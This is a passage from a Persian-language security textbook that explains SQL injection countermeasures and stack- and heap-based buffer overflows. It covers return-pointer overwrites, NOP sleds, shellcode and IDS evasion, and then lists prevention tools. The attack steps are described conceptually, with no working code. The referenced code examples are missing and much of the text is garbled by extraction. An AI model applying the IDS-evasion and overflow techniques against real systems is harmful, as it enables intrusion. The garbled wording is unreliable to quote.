ﺑﺮاي اﻣﻦ ﺳﺎزي ﺑﺮﻧﺎﻣﻪ ﻫﺎ در ﺮﺑاﺮﺑ SQL injection ، ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﺎن ﺑﺎﻳﺴﺘﻲ اﺟﺎزه ﻧﺪﻫﻨﺪ ﻛﻪ داده ﻫﺎي ﻛﻼﻳﻨﺖ ﺑﺘﻮاﻧﺪ ﮔﺮاﻣﺮ ( syntax ) دﺳﺘﻮرات SQL را ﺗﻐﻴﻴﺮ دﻫﺪ . ﺗﻤﺎم دﺳﺘﻮرات SQL ﻛﻪ ﺑﺮاي ﺑﺮﻧﺎﻣﻪ ﻣﻮرد ﻧﻴﺎز ﻫﺴﺘﻨﺪ، ﺑﺎﻳﺪ در ﭘﺮدازش ﻫﺎي ذﺧﻴﺮه ﺷﺪه روي ﺳﺮور ﭘﺎﻳﮕﺎه داده ﻗﺮار ﮔﻴﺮﻧﺪ . ﺑﺮﻧﺎﻣﻪ ﺑﺎﻳﺪ ﺑﺎ اﺳﺘﻔﺎده از اﻳﻨﺘﺮﻓﻴﺲ ﻫﺎي اﻣﻨﻲ ﭼﻮن JDBC ﻳﺎ ADO ﺑﺮاي اﺟﺮاي ﭘﺮدازش ﻫﺎي ذﺧﻴﺮه ﺷﺪه اﺳﺘﻔﺎده ﻛﻨﺪ.

ﻣﻘﺎﺑﻠﻪ ﺑﺎ SQL Injection

اوﻟﻴﻦ روش ﺟﻠﻮﮔﻴﺮي از ﺣﻤﻠﻪ SQL injection ، ﻛﺎﻫﺶ ﺳﻄﺢ ارﺗﺒﺎﻃﻲ ﻛﺎرﺑﺮ ﺑﺎ ﭘﺎﻳﮕﺎه داده و ﻗﺮار دادن ﭘﺴﻮرد ﭘﻴﭽﻴﺪه ﺑﺮاي اﻛﺎﻧﺖ ﻫﺎي sa و administrator اﺳﺖ . ﺷﻤﺎ ﺑﺎﻳﺪ ﭘﻴﺎم ﻫﺎي ﺗﺸﺮﻳﺤﻲ و ﺗﻮﺿﻴﺤﻲ را ﻏﻴﺮ ﻓﻌﺎل ﺳﺎزﻳﺪ ﺗﺎ اﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺿﺮوري ﻧﻴﺴﺘﻨﺪ، ﺑ ﺮاي ﻫﻜﺮ ارﺳﺎل ﻧﺸﻮد ( اﻳﻦ اﻃﻼﻋﺎت ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ ﻫﻜﺮ در ﺗﺸﺨﻴﺺ آﺳﻴﺐ ﭘﺬﻳﺮ ﺑﻮدن SQL server ، ﻛﻤﻚ ﻛﻨﺪ ). ﻫﻤﭽﻨﻴﻦ ﻫﻴﭽﮕﺎه ﺑﺎ دﺳﺘﺮﺳﻲ اﻛﺎﻧﺖ admin ، ﺑﻪ ﭘﺎﻳﮕﺎه داده ﻣﺘﺼﻞ ﻧ ﺸﻮﻳﺪ . ﺑﺮاي داده ﻫﺎي ﺣﺴﺎس از رﻣﺰﮔﺬاري اﺳﺘﻔﺎده ﻛﻨﻴﺪ و آﻧﻬﺎ را ﺑﺼﻮرت ﻏﻴﺮ رﻣﺰ ﺷﺪه ذﺧﻴﺮه ﻧﻜﻨﻴﺪ . .

ﺿﺮورت دارد ﻛﻪ ﻛﺪ را ﺑﺎزﺑﻴﻨﻲ ﻛﻨﻴﺪ ﺗﺎ ﺿﻌﻒ ﻫﺎي ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﻲ زﻳﺮ را ﺑﺮرﺳﻲ ﻛﻨﻴﺪ : :

• ﻓﻘﻂ ﻛﻮﺗﺎ ( single quota) • ﻋﺪم ﺑﺮر ﺳﻲ دﻗﻴﻖ ورودي

170

ﺑﺮﺧﻲ از روش ﻫﺎي ﻣﻘﺎﺑﻠﻪ ﺑﻪ SQL injection ﻋﺒﺎرﺗﻨﺪ از : :

• ﻋﺪم ﭘﺬﻳﺮش ورودي ﻫﺎي ﻧﺎدرﺳﺖ • ﺑﺮرﺳﻲ ﻣﺤﺪودﻳﺖ ﻫﺎي ورودي

ﻳﻚ ﻛﺪ ﺻﺤﻴﺢ ﺑﺮاي ﺻﻔﺤﻪ ﻻﮔﻴﻦ ﺑﻪ ﺻﻮرت زﻳﺮ اﺳﺖ : :

ﻫﻤﭽﻨﻴﻦ از ﻧﺮم اﻓﺰار Acunetix Web Vulnerability Scanner ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ و ﮔﺰارش آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي SQL ﺑﺮﻧﺎﻣﻪ ﻳﺎ وب ﺳﺎﻳﺖ ﺗﺎن اﺳﺘﻔﺎده ﻛﻨﻴﺪ . .

ﭼﺮا ﺑﺮﻧﺎﻣﻪ ﻫﺎ آﺳﻴﺐ ﭘﺬﻳﺮﻧﺪ؟

• ﻣﺤﺪودﻳﺖ ﻫﺎ ﺑﻄﻮر ﻛﺎﻣﻞ ﺑﺮرﺳﻲ ﻧﻤﻲ ﺷﻮﻧﺪ و ﻳﺎ اﻳﻨﻜﻪ اﺻﻼ ﺑﺮرﺳﻲ ﻧﻤﻲ ﺷﻮﻧﺪ . . • زﺑﺎن ﻫﺎي ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﻲ ﻫﻤﭽﻮن C داراي ﺧﻄﺎﻫﺎﻳﻲ اﺳﺖ • ﺗﻮاﺑﻊ ()gets() ، bcopy() ، sprint() ، strcpy() ، strcat و ()scanf ﻣﻲ ﻧﺗﻮا ﻨﺪ ﻣﻮرد ﺳﻮاﺳﺘﻔﺎده ﻗﺮار ﮔﻴﺮﻧﺪ ﺑﺮاي اﻳﻨﻜﻪ اﻳﻦ ﺗﻮاﺑﻊ، ﺑﺮرﺳﻲ ﻧﻤﻲ ﻛﻨﻨﺪ ﻛﻪ ﺑﺒﻴﻨﻨﺪ آﻳﺎ ﺑﺎﻓﺮي ﻛﻪ روي ﭘﺸﺘﻪ اﺧﺘﺼﺎص داده ﺷﺪه اﺳﺖ، ﺑﻪ اﻧﺪازه ﻛﺎﻓﻲ ﺑﺮاي ﻛﭙﻲ داده ﻫﺎ داﺧﻞ آن ﺑﺰرگ اﺳﺖ ﻳﺎ ﻧﻪ

171

اﻧﻮاع Buffer Overflow و روش ﻫﺎي ﺷﻨﺎﺳﺎﻳﻲ

Buffer overflow ﻫﺎ، ﻛا ﺴ ﻳﻮﻠﭙ ﺖ ﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮ ﻋﻠﻴﻪ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻳﺎ ﺑﺮﻧﺎﻣﻪ اي اﺳﺘﻔﺎده ﻛﻨﺪ . اﻳﻦ ﺣﻤﻠﻪ ﻧﻴﺰ ﻣﺎﻧﻨﺪ ﺣﻤﻼت SQL injection ، از ﻓﻴﻠﺪﻫﺎي ورودي ﻛﺎرﺑﺮ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﺣﻤﻠﻪ، ﺑﺎ ﺳ ﺰﻳرﺮ ﻛﺮدن ﺣﺎﻓﻈﻪ ﻳﺎ اﺟﺮاي ﻳﻚ shell دﺳﺘﻮري ﻳﺎ ﻛﺪ ﻣﻮرد دﻟﺨﻮاه ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻫﺪف ﺑﺎﻋﺚ از ﻛﺎر اﻧﺪاﺧ ﺘﻦ ﺳﻴﺴﺘﻢ ﻣﻲ ﺷﻮد . . آﺳﻴﺐ ﭘﺬﻳﺮي buffer overflow ، ﺑﻪ ﺧﺎﻃﺮ ﻋﺪم ﺑﺮرﺳﻲ ﻛﺎﻓﻲ ﻣﺤﺪودﻳﺖ ﻫﺎي ﻓﻴﻠﺪ ورودي ﻛﺎرﺑﺮ در ﻓﺮم وب اﺳﺖ . اﮔﺮ ﺑﺮﻧﺎﻣﻪ اي، ﻗﺒﻞ از ارﺳﺎل داده ﻫﺎي ﻓﺮم ﻛﺎرﺑﺮ ﺑﺮاي ذﺧﻴﺮه ﺳﺎزي، اﻧﺪازه ﻳﺎ ﻓﺮﻣﺖ ﻣﺘﻐﻴﺮ را ﺑﺮرﺳﻲ ﻧﻜﻨﺪ، آﺳﻴﺐ ﭘﺬﻳﺮي overflow وﺟﻮد دارد . .

ﻛﺪ زﻳﺮ را در ﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ . زﻣﺎﻧﻴﻜﻪ اﻳﻦ ﻛﺪ ﻛﺎﻣﭙﺎﻳﻞ و اﺟﺮا ﻣﻲ ﺷﻮد، ﺑﻠﻮﻛﻲ از 32 ﺑﺎﻳﺖ را ﺑﺮاي ﻧﮕﻪ داﺷﺘﻦ رﺷﺘﻪ اﺧﺘﺼﺎص ﻣﻲ دﻫﺪ . اﻳﻦ ﻧﻮع آﺳﻴﺐ ﭘﺬﻳﺮي، در ﺳﻴﺴﺘﻢ ﻫﺎي ﻣﺒﺘﻨﻲ ﺑﺮ ﻳﻮﻧﻴﻜﺲ و NT راﻳﺞ اﺳﺖ . .

ﭘﺸﺘﻪ ( Stack ): ):

ﭘﺸﺘﻪ، از ﻣﻜﺎﻧﻴﺰم LIFO ﭘﻴﺮوي ﻣﻲ ﻛﻨﺪ ( last in first out ). ﻣﺸﺎﺑﻪ ﺑﺎﻓﺮ ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ و ﻫﻤﻪ اﻃﻼﻋﺎت را ﻛﻪ ﺗﻮاﺑﻊ ﻧﻴﺎز دارﻧﺪ را ﻧﮕﻪ ﻣﻲ دارد . ﭘﺸﺘﻪ، اﺑﺘﺪاي ﺗﺎﺑﻊ اﻳﺠﺎد ﻣﻲ ﺷﻮد و در اﻧﺘﻬﺎي ﺗﺎﺑﻊ، آزاد ( release ) ﻣﻲ ﺷﻮد . .

172

: : Heap

Heap ، ﻣﻨﻄﻘﻪ اي از ﺣﺎﻓﻈﻪ اﺳﺖ ﻛﻪ ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪ اي اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد ﻛﻪ ﺑﺼﻮرت ﭘﻮﻳﺎ در زﻣﺎن اﺟﺮا اﺧﺘﺼﺎص داده ﻣﻲ ﺷﻮد . ﻣﺘﻐﻴﺮﻫﺎي اﺳﺘﺎﺗﻴﻚ در ﭘﺸﺘﻪ ذﺧﻴﺮه ﻣﻲ ﺷﻮﻧﺪ ﻛﻪ داده ﻫﺎ ﺑﺎ اﺳﺘﻔﺎده از راﺑﻂ malloc اﺧﺘﺼﺎص ﻣﻲ ﻳﺎﺑﺪ . .

دو ﻧﻮع buffer overflow وﺟﻮد دارد : stack-based و Stack . heap-baesd و heap ، ﻣﻜﺎن ﻫﺎي ﺣﺎﻓﻈﻪ ﺑﺮاي ﻣﺘﻐﻴﺮﻫﺎي ﻛﺎرﺑﺮ ﺑﺎ ﺑﺮﻧﺎﻣﻪ در ﺣﺎل اﺟﺮا ﻫﺴﺘﻨﺪ . ﻣﺘﻐﻴﺮﻫﺎ در stack ﻳﺎ heap ذﺧﻴﺮه ﻣﻲ ﺷﻮﻧﺪ ﺗﺎ زﻣﺎﻧﻴﻜﻪ ﺑﺮﻧﺎﻣ ﻪ ﺑﻪ آﻧﻬﺎ ﻧﻴﺎز داﺷﺘﻪ ﺑﺎﺷ .ﺪﻨ ﭘﺸﺘﻪ ﻫﺎ ( stack )ﻫﺎ ، ﻣﻜﺎن ﻫﺎي ﺛﺎﺑﺘﻲ از ﻓﻀﺎي آدرس ﺣﺎﻓﻈﻪ ﻫﺴﺘﻨﺪ در ﺣﺎﻟﻴﻜﻪ heap ﻫﺎ، ﻓﻀﺎي آدرس ﻫﺎي ﺣﺎﻓﻈﻪ ﭘﻮﻳﺎ ﻫﺴﺘﻨﺪ ﻛﻪ زﻣﺎﻧﻴﻜﻪ ﺑﺮﻧﺎﻣﻪ اي در ﺣﺎل اﺟﺮا اﺳﺖ، ﺷﻜﻞ ﻣﻲ ﮔﻴﺮﻧﺪ . Buffer overflow ﻣﺒﺘﻨﻲ ﺑﺮ heap ، در ﺑﺨﺶ ﻛﻮﭼﻜﺘﺮي از ﺣﺎﻓﻈﻪ رخ ﻣﻲ دﻫﺪ و ﻣﺘﻐﻴﺮﻫﺎي ﭘﻮﻳﺎي دﻳﮕﺮ را overwrite ﻣﻲ ﻛﻨﺪ . در ﻧﺘﻴﺠﻪ، ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻣﻲ ﺗﻮاﻧﺪ shell ﻳﺎ Cmd را ﺑﺎز ﻛﻨﺪ ﻳﺎ ﺟﻠﻮي اﺟﺮاي ﺑﺮﻧﺎﻣﻪ ﻫﺎ را ﺑﮕﻴﺮد . .

173

ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي buffer overflow ﻛﻪ ﻧﺎﺷﻲ از ﺿﻌﻒ در ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﻲ اﺳﺖ، ﻫﻜﺮ، ﻣﻘ ﺪار زﻳﺎدي داده از ﻃﺮﻳﻖ ﻓﻴﻠﺪ ﻓﺮم ﺑﻪ ﺑﺮﻧﺎﻣﻪ ﻣﻲ ﻓﺮﺳﺘﺪ و ﺑﻪ ﻧﺘﻴﺠﻪ ﺑﺮﻧﺎﻣﻪ ﻧﮕﺎه ﻣﻲ ﻛﻨﺪ . .

ﺳ ﺰﻳرﺮ ي ﺮﻓﺎﺑ ﻣﺒﺘﻨﻲ ﺑﺮ ﭘﺸﺘﻪ (stack-based buffer overflow ) )

Buffer overflow ﻫﺎي ﻣﺒﺘﻨﻲ ﺑﺮ ﭘﺸﺘﻪ ( stack-based ) زﻣﺎﻧﻲ رخ ﻣﻲ دﻫﺪ ﻛﻪ ﺑﺎﻓﺮ از ﻓﻀﺎي ﭘﺸﺘﻪ ﺗﺠﺎوز ﻛﻨﺪ و ﺑﻴﺸﺘﺮ ﺷﻮد . ﻛﺪ ﻣﺨﺮب ﻣﻲ ﺗﻮاﻧﺪ وارد ﭘﺸﺘﻪ ﺷﻮد . ﺳﺮرﻳﺰي، ﻣﻲ ﺗﻮاﻧﺪ اﺷﺎره ﮔﺮ ﺑﺎزﮔﺸﺘﻲ را overwrite ﻛﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ، ﺟﺮﻳﺎن ﻛﻨﺘﺮل ﺑﻪ ﻛﺪ ﻣﺨﺮب ﺗﻐﻴﻴﺮ ﻣﻲ ﻛﻨﺪ . زﺑﺎن C و ﻣﺸﺘﻘﺎت آن، روش ﻫﺎي زﻳﺎدي ﺑﺮاي ﻗﺮار دادن داده ﻫﺎي زﻳﺎد ( ﺑﻴﺸﺘﺮ از اﻧﺘﻈﺎر ) داﺧﻞ ﻳﻚ ﺑﺎﻓﺮ ﭘﻴﺸﻨﻬﺎد ﻣﻲ دﻫﺪ . .

ﻣﺮاﺣﻠﻲ ﻛﻪ ﻫﻜﺮ ﺑﺮاي اﺟﺮاي اﻳﻦ ﻧﻮع ﺣﻤﻠﻪ اﻧﺠﺎم ﻣﻲ دﻫﺪ ﻋﺒﺎرﺗﻨﺪ از : :

.1 ﻣﺘﻐﻴﺮي در ﺑﺎﻓﺮ ﺑﺮاي ﺗﺨﻠﻴﻪ ﺣﺎﻓﻈﻪ ﭘﺸﺘﻪ ( stack ) وارد ﻣﻲ ﻛﻨﺪ. .2 ﺑﻴﺸﺘﺮ از ﻣﻘﺪاري ﻛﻪ در ﺣﺎﻓﻈﻪ ﺑﺮاي ﺑﺎﻓﺮ ﻛﺮدن ﻣﺘﻐﻴﺮ در ﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﺪه اﺳﺖ، داده وارد ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺳﺒﺐ ﺳﺮرﻳﺰي ﺣﺎﻓﻈﻪ ﻳﺎ اﺟﺮا در ﻓﻀﺎي ﺣﺎﻓﻈﻪ ﭘﺮدازش ﺑﻌﺪي ﺷﻮد . ﺳ ﭙﺲ، ﻣﺘﻐﻴﺮ دﻳﮕﺮي را اﺿﺎﻓﻪ ﻣﻲ ﻛﻨﺪ و اﺷﺎره ﮔﺮ ﺑﺮﮔﺸﺘﻲ را overwrite ﻣﻲ ﻛﻨﺪ ﻛﻪ ﺑﻪ ﺑﺮﻧﺎﻣﻪ ﻣﻲ ﮔﻮﻳﺪ ﭘﺲ از اﺟﺮا ﺷﺪن ﻣﺘﻐﻴﺮ، ﺑﻪ ﻛﺠﺎ ﺑﺮﮔﺮدد. .3 ﺑﺮﻧﺎﻣﻪ، ﻣﺘﻐﻴﺮ اﻳﻦ ﻛﺪ ﻣﺨﺮب را اﺟﺮا ﻣﻲ ﻛﻨﺪ و ﺳﭙﺲ از اﺷﺎره ﮔﺮ ﺑﺎزﮔﺸﺘﻲ ﺑﺮاي ﺑﺎزﮔﺸﺖ ﺑﻪ ﺧﻂ ﺑﻌﺪي ﻛﺪ ﻗﺎﺑﻞ اﺟﺮا، اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . اﮔﺮ ﻫﻜﺮ ﺑﺘﻮاﻧﺪ ﺑﺼﻮرت ﻣﻮﻓﻘﻴﺖ آﻣﻴﺰي اﺷﺎره ﮔﺮ را overwrite ﻛﻨﺪ، آﻧﮕﺎه ﺑﺮﻧﺎﻣﻪ، ﺑﻪ ﺟﺎي اﺟﺮاي ﻛﺪ ﺑﺮﻧﺎﻣﻪ، ﻛﺪ ﻫﻜﺮ را اﺟﺮا ﻣﻲ ﻛﻨﺪ.

174

ﺑﺴﻴﺎري از ﻫﻜﺮﻫ ﺎ، ﻧﻴﺎزي ﺑﻪ آﺷﻨﺎﻳﻲ ﺑﺎ ﺟﺰﺋﻴﺎت buffer overflow ﻫﺎ ﻧﺪارﻧﺪ ﺑﺮاي اﻳﻨﻜﻪ ﻛا ﺴ ﻳﻮﻠﭙ ﺖ ﻫﺎي از ﭘﻴﺶ ﻧﻮﺷﺘﻪ ﺷﺪه آﻣﺎده اي ﺑﺮ روي اﻳﻨﺘﺮﻧﺖ وﺟﻮد دار د ﻛﻪ ﺑﻴﻦ ﻫﻜﺮﻫﺎي ﻣﺨﺘﻠﻒ ور و ﺪﺑ ل ﻣﻲ ﺷﻮد . .

ﻧﻜﺘﻪ: رﺟﻴﺴﺘﺮ ﺣﺎﻓﻈﻪ ﻛﻪ ﻛﺪ ﻛا ﺴ ﻳﻮﻠﭙ ﺖ ﻧﻮﺷﺘﻪ ﺷﺪه ( overwritten ) و آدرس ﺑﺮﮔﺸﺘﻲ آن را ﻣﻲ ﮔﻴﺮد، EIP ﻧ ﺎم دارد . .

ﺳ ﺰﻳرﺮ ي ﺮﻓﺎﺑ ﻨﺘﺒﻣ ﻲ ﺮﺑ heap-based overflow) heap ) )

ﻣﺘﻐﻴﺮﻫﺎﻳﻲ ﻛﻪ ﺑﺼﻮرت ﭘﻮﻳﺎ ﺑﻪ ﺗﻮاﺑﻊ اﺧﺘﺼﺎص ﻣﻲ ﻨﻳﺎﺑ (ﺪ از ﻗﺒﻴﻞ ()malloc) ، در heap اﻳﺠﺎد ﻣﻲ ﺷﻮﻧﺪ . در اﻳﻦ ﺣﻤﻠﻪ، ﻫﻜﺮ، ﺑﺎﻓﺮي را ﻛﻪ در ﺑﺨﺶ ﭘﺎﻳﻴﻦ ﺗﺮ heap ﻗﺮار دارد، ﺳﺮرﻳﺰ ﻣﻲ ﻛﻨﺪ و ﻣﺘﻐﻴﺮﻫﺎي ﭘﻮﻳﺎي دﻳﮕﺮ را overwrite ﻣﻲ ﻛﻨﺪ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ ﺗﺎﺛﻴﺮات ﻧﺎﺧﻮاﺳﺘﻪ ﻳﺎ ﻏﻴﺮﻣﻨﺘﻈﺮه داﺷﺘﻪ ﺑﺎﺷﺪ . .

اﮔﺮ ﺑﺮﻧﺎﻣﻪ اي ﺑﺪون ﺑﺮرﺳﻲ اﻳﻨﻜﻪ داده اي ﺑﺮاي ﻣﻘﺼﺪ، ﻣﻨﺎﺳﺐ اﺳﺖ ﻳﺎ ﻧﻪ، اﻗﺪام ﺑﻪ ﻛﭙﻲ آن ﻛﻨﺪ، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ داده ﻫﺎﻳﻲ ﻛﻪ ﺑﺴﻴﺎر ﺑﺰرگ ﻫﺴﺘﻨﺪ را ﺑﻪ ﺑﺮﻧﺎﻣﻪ دﻫﺪ و اﻃﻼﻋﺎت ﻣﺪﻳﺮﻳﺖ heap را overwrite ﻛﻨﺪ . .

ﺷﻞ ﻛﺪ ( Shellcode) ، روﺷﻲ ﺑﺮاي اﺳﺘﻔﺎده از stack-based overflow اﺳﺖ . ﺷﻞ ﻛﺪ، از ﻣﺸﻜﻼت ﻛﺎﻣﭙﻴﻮﺗﺮ ﺑﺮاي ﻣﺪﻳﺮﻳﺖ ﭘﺸﺘﻪ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . ﺑﺎﻓﺮﻫﺎ، ﻣﻘﺎﺻﺪ راﺣﺘﻲ ﺑﺮاي ﻫﻜﺮﻫﺎ ﻫﺴﺘﻨﺪ ﺑﺮاي اﻳﻨﻜﻪ آﻧﻬﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﻪ آﺳﺎﻧﻲ ﺳ ﺰﻳرﺮ ﻛﻨﻨﺪ . .

175

روش ﺷﻨﺎﺳﺎﻳﻲ buffer overflow در ﺑﺮﻧﺎﻣﻪ

دو روش ﺑﺮاي اﻳﻦ ﻣﻨﻈﻮر وﺟﻮد دارد : اوﻟﻴﻦ روش اﻳﻦ اﺳﺖ ﻛﻪ ﻛﺪ ﻣﻨﺒﻊ ﺑﺮﻧﺎﻣﻪ را ﺑﺮرﺳﻲ ﻛﻨﻴﺪ . ﻳﻌﻨﻲ ﺗﻮاﺑﻊ را ﺑﺮرﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺑﺒﻴﻨﻴﺪ آﻳﺎ ﺑﻪ درﺳﺘﻲ اﺳﺘﻔﺎده ﺷﺪه اﻧﺪ ﻳﺎ ﻧﻪ . ﻣﺨﺼﻮﺻﺎ ﺗﻮاﺑﻌﻲ ﻛﻪ ورودي ﻳﺎ ﺧﺮوﺟﻲ آﻧﻬﺎ ﺑﻪ رﺷﺘﻪ ( string ) ﻣﺮﺑﻮط ﻣﻲ ﺪﻧﺷﻮ . دوﻣﻴﻦ روش، وارد ﻛﺮدن ﻣﻘﺪار زﻳﺎدي داده ﺑﻪ ﺑﺮﻧﺎﻣﻪ و ﺑﺮرﺳﻲ رﻓﺘﺎر ﻏﻴﺮ ﻃﺒﻴﻌﻲ آن اﺳﺖ . .

ﻓﺮض ﻛﻨﻴﺪ ﻛﻪ ﻫﻜﺮي از ﻳﻚ ﺗﺎﺑﻊ رﺷﺘﻪ اي ﺳﻮاﺳﺘﻔﺎده ﻛﻨﺪ و ﺑﺘﻮاﻧﺪ ﻳﻚ رﺷﺘﻪ ﻃﻮﻻﻧﻲ را ﺑﻪ ﻋﻨﻮان ورودي ارﺳﺎل ﻛﻨﺪ . اﻳﻦ رﺷﺘﻪ، ﺳﺒﺐ ﺳﺮرﻳﺰي ﺑﺎﻓﺮ و ﺧﻄﺎي segmentation ﻣﻲ ﺷﻮد . اﺷﺎره ﮔﺮ ﺑ ﺎزﮔﺸﺘﻲ ﺗﺎﺑﻊ، overwrite ﻣﻲ ﺷﻮد و ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺟﺮﻳﺎن اﺟﺮا را ﺗﻐﻴﻴﺮ دﻫﺪ . ﭘﺲ از آﻧﻜﻪ ﻫﻜﺮ ﺗﻮاﻧﺴﺖ ﻛﺪ ﺧﻮد را وارد ﻛﻨﺪ ﺑﺎﻳﺪ آدرس دﻗﻴﻖ و اﻧﺪازه ﭘﺸﺘﻪ را ﺑﺪاﻧﺪ و اﺷﺎره ﮔﺮ ﺑﺎزﮔﺸﺘﻲ را ﺑﺮاي اﺟﺮاي ﻛﺪ ﺧﻮد، ﻫﺪف ﮔﻴﺮي ﻛﻨﺪ . .

ﺗﻜﻨﻴﻚ ﻫﺎي ﺗﻐﻴﻴﺮ buffer overflow

ﻫﻤﺎﻧﻄﻮرﻳﻜﻪ ﻣﻲ ﺑﻴﻨﻴﺪ، ﻫﻜﺮﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﺎ اﺳﺘﻔﺎده از buffer overflow ، ﺑﺮاي ﻫﺪاﻳﺖ اﺷﺎره ﮔﺮ ﺑﺮﮔﺸﺘﻲ ﺑﻪ ﻛﺪ ﺧﻮد اﺳﺘﻔﺎده ﻛﻨ ﺪﻨ . ﻫﻜﺮ ﺑﺎﻳﺪ آدرس ﺣﺎﻓﻈﻪ و اﻧﺪازه ﺸﭘ ﻪﺘ را دﻗﻴﻘ ﺎ ﺑﺪاﻧﺪ ﺗﺎ اﺷﺎره ﮔﺮ ﺑﺮﮔﺸﺘﻲ ، آن ﻛﺪ را اﺟﺮا ﻛﻨﺪ . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ از ﻳﻚ دﺳﺘﻮراﻟﻌﻤﻞ No Operation ) NOP ) اﺳﺘﻔﺎده ﻛﻨﺪ ﻛﻪ ﻓﻘﻂ padding ﻫﺴﺘﻨﺪ و ﺑﺮاي ﺟﺎﺑﺠﺎﻳﻲ اﺷﺎره ﮔﺮ ا ﺳﺖ و ﻫﻴﭻ ﻛﺪي را اﺟﺮا ﻧﻤﻲ ﻛﻨﺪ . NOP ، ﺑﻪ رﺷﺘﻪ ﻗﺒﻞ از ﻛﺪ ﻣﺨﺮب اﺿﺎﻓﻪ ﻣﻲ ﺷﻮد ﺗﺎ اﺟﺮا ﺷﻮد . .

اﮔﺮ در ﺷﺒﻜﻪ اي ، IDS وﺟﻮد داﺷﺘﻪ ﺑﺎﺷﺪ، ﺗﻼش ﻫﻜﺮ ﺑﺮاي ارﺳﺎل ﻣﺠﻤﻮ ﻋﻪ اي از NOP ﻫﺎ ﺑﺮاي ﻓﺮواد ﻛﺮدن اﺷﺎره ﮔﺮ دﺳﺘﻮراﻟﻌﻤﻞ، ﺧﻨﺜﻲ ﻣﻲ دﺷﻮ . ﺑﺮاي دور زدن IDS ، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﺗﻌﺪادي NOP ﺗﺼﺎدﻓﻲ را ﺑﺎ ﺗﻜﻪ ﻫﺎي ﻫﻢ ارز ،ﻛﺪ ﺟﺎﻳﮕﺰﻳﻦ ﻛﻨﺪ ﻣﺜﻼ x++ , x--;?NOPNOP . اﻳﻦ ﻣﺜﺎﻟ ﻲ از ﺣﻤﻠﻪ buffer overflow ﺗﻐﻴﻴ ﺮ داده ﺷﺪه اﺳﺖ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ از ﺷﻨﺎﺳﺎﻳﻲ ﺷﺪن ﺗﻮﺳﻂ IDS ﺟﻠﻮﮔﻴﺮي ﻣﻲ ﻛﻨﺪ . .

ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﺎن ﻧﺒﺎﻳﺪ از ﺗﻮاﺑﻊ ﺧﻮد زﺑﺎن C ﻳﺎ ++C از ﻗﺒﻴﻞ ()strcat() ، strcpy ، و ()streadd اﺳﺘﻔﺎده ﻛﻨﻨ ﺪ ﺑﺮاي اﻳﻨﻜﻪ آﻧﻬﺎ ﻣﺴﺘﻌﺪ ﺣﻤﻠﻪ buffer overflow ﻫﺴﺘﻨﺪ . ﺟﺎوا ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ ﻋﻨﻮان زﺑﺎن ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﻲ ﺟﺎﻳﮕﺰﻳﻦ اﺳﺘﻔﺎده ﺷﻮد ﺑﺮاي اﻳﻨﻜﻪ در ﻣﻘﺎﺑﻞ ﺣﻤﻼت buffer overflow ، ﻣﻘﺎوم ﺳا ﺖ . .

176

روش ﻫﺎي ﺟﻠﻮﮔﻴﺮي از buffer overflow

RAD ، ﻳﻚ patch ﺳﺎده ﺑﺮاي ﻛﺎﻣﭙﺎﻳﻠﺮ اﺳﺖ ﻛﻪ ﺑﺼﻮرت ﺧﻮدﻛﺎر، ﻧﻮاﺣﻲ اﻣﻨﻲ اﻳﺠﺎد ﻣﻲ ﻛﻨﺪ ﺗﺎ ﻳﻚ ﻛﭙﻲ آدرس ﺑﺮﮔﺸﺘﻲ را ذﺧﻴﺮه ﻛﻨﺪ . ﭘﺲ از آن، ﺑﺮاي ﻣﺤﺎﻓﻈﺖ از ﺑﺮﻧﺎﻣﻪ، ﻛﺪي را اﺿﺎﻓﻪ ﻣﻲ ﻛﻨﺪ و ﺑﺮﻧﺎﻣﻪ را ﻛﺎﻣﭙﺎﻳﻞ ﻣﻲ ﻛﻨﺪ ﺗﺎ از ﺣﻤﻼت buffer overflow ﺟﻠﻮﮔﻴﺮي ﻛﻨﺪ . .

ﻫﻤﭽﻨﻴﻦ از اﺑﺰارﻫﺎﻳﻲ ﻧﻈﻴﺮ Libsafe ، Insure++ ، Valgrind ، Immunix System ، StackGuard ﺑﺮاي ﻧﻮﺷﺘﻦ ﺑﺮﻧﺎﻣﻪ اﻣﻦ و ﺟﻠﻮﮔﻴﺮي از ﺣﻤﻼت buffer overflow اﺳﺘﻔﺎده ﻛﻨﻴﺪ.

177

ﻓﺼﻞ دﻫﻢ

